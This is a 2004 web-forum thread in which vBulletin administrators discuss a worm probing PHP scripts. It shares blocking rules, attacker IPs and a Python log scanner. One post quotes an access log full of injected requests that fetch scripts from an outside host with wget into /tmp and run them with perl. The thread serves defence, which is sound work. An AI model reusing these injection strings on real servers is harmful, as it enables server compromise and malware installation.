To view the coding, right-click the broken image and save it to disk. Rename it, giving it a .txt extension, and then open it in any text editor.
showthread attack attempt?
It is easy to block them. Put the code of the attachment into .htaccess.
Streicher
-
Same happened to mine last night.
Server admin has sent me a full log; don't know if it is of any use.
Please talk to vBulletin about the following security hole in their system. Intruder got in last night through your site the following way and uploaded files to the temp dir, driving the load on the server up.
The vulnerability is in:
save-concorde.org.uk/forums/printthread.php?t=1134/showthread.php?
The hacker's IP is 66.90.67.40, 64.191.63.149 etc.
Code:
###########################
save-concorde.org.uk:64.191.63.149 - - [25/Dec/2004:09:03:27 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET /forums/printthread.php?t=1134/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11380 "-" "LWP::Simple/5.803"
save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:02 -0500] "GET /forums/printthread.php?t=1229/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11383 "-" "LWP::Simple/5.803"
save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET /forums/printthread.php?t=1229/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11383 "-" "LWP::Simple/5.65"
save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET /forums/printthread.php?t=907/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:59 -0500] "GET /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:20:02 -0500] "GET /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
Last edited by Jerry; Sun 26 Dec '04, 9:49am.
-
Your admin doesn't know what he's talking about. It's a worm that's trying to attack ALL PHP scripts by attempting to pass a long string into ALL variables it can find. The problem is that on Google vBulletin is the most popular PHP link, so we're getting more attacks.
If something actually wrote something to the tmp directory then it wasn't from vBulletin.
-
So they aren't actually a threat, as vBulletin is secure in this particular manner?
I hate having to use HTACCESS for anything much other than disabling directory viewing.
Alcar...
-
What's happening is these worms are trying every variable they can find and attempting to exploit them, Alcar.
The .htaccess is merely to jam up the bots from bombarding and overwhelming your server. It won't affect your users.
ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment
-
Just an FYI for those who are blocking by IP, I caught these guys running around my site..
67.15.52.18 - LWP::Simple/5.803
69.93.114.234 - LWP::Simple/5.65
81.4.64.206 - LWP::Simple/5.63
66.98.172.100 - LWP::Simple/5.65
66.98.152.87 - LWP::Simple/5.65
69.93.114.234 - LWP::Simple/5.65
-
Can't really be done by IP address since any exploited box will do it.
Yesterday morning when I saw it happening, I also blocked it with a quick .htaccess entry, which worked. In case anyone couldn't get it to work with the one posted for whatever reason, this is what I'm using:
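Code:
# Answer 403 Forbidden to any client whose User-Agent begins with LWP or lwp.
# (The trailing * applies only to the final letter, so "LW"/"lw" prefixes match too.)
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP* [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp*
RewriteRule .* - [F]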
Sphinx Search for vBulletin 4: https://marketplace.digitalpoint.com...tin-4.870/item
Someone send me a message on Twitter when this site is usable again. https://twitter.com/digitalpoint
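The following Python is an added example, not code from any poster in this thread: it parses access-log lines in the layout posted above and separates requests that carry an injected URL or command chain in a parameter from requests that merely use an LWP user agent. The sample lines, their hosts and addresses, and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Layout of the posted log: vhost:client - - [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$')
REMOTE_URL = re.compile(r'(?:https?|ftp)://', re.I)
SHELL_CHAIN = re.compile(r'(?:^|[;|&]\s*)(?:wget|curl|perl|sh)\b', re.I)
SCRIPTED_AGENT = re.compile(r'^lwp', re.I)  # same prefix the .htaccess rule keys on

def inspect_line(line):
    """Return (ip, status, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    findings = []
    _, _, query = m['target'].partition('?')
    for pair in filter(None, query.split('&')):
        name, _, value = pair.partition('=')
        value = unquote_plus(value)          # %20 -> space before matching
        if REMOTE_URL.search(value):
            findings.append(f'remote-url:{name}')
        if SHELL_CHAIN.search(value):
            findings.append(f'shell-chain:{name}')
    if SCRIPTED_AGENT.match(m['agent']):
        findings.append('scripted-agent')
    # A 200 only means the script answered; it is not evidence the command ran.
    return m['ip'], int(m['status']), findings

def probes(lines):
    """Keep requests with an injected parameter, not merely an unusual agent."""
    hits = []
    for line in lines:
        result = inspect_line(line)
        if result and any(f != 'scripted-agent' for f in result[2]):
            hits.append(result)
    return hits

# Constructed sample lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    'forum.example.org:192.0.2.10 - - [25/Dec/2004:09:03:27 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://attacker.example/spy.gif?&cmd=cd%20/tmp;wget%20attacker.example/a.txt;perl%20a.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"',
    'forum.example.org:198.51.100.7 - - [25/Dec/2004:09:04:10 -0500] "GET /forums/showthread.php?t=1134 HTTP/1.1" 200 20311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    'forum.example.org:203.0.113.5 - - [25/Dec/2004:09:05:00 -0500] "GET /forums/index.php HTTP/1.1" 200 9120 "-" "LWP::Simple/5.65"',
]

if __name__ == '__main__':
    for ip, status, findings in probes(SAMPLE_LOG):
        print(ip, status, ', '.join(findings))
```

Matching on the request contents rather than the client address keeps working when the probes arrive from a different source each time.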
-
Also see http://www.vbulletin.com/forum/showthread.php?t=124244
Several of us have been seeing this.
-
Hmmm, so that's why our long-standing (year and a half, or thereabouts) "Most users ever online" was broken yesterday. Saw a bunch of LWP'ers on WOL so I banned the lot.
Thanks for the info, all.
-
Originally posted by Streicher
It is easy to block them. Put the code of the attachment into .htaccess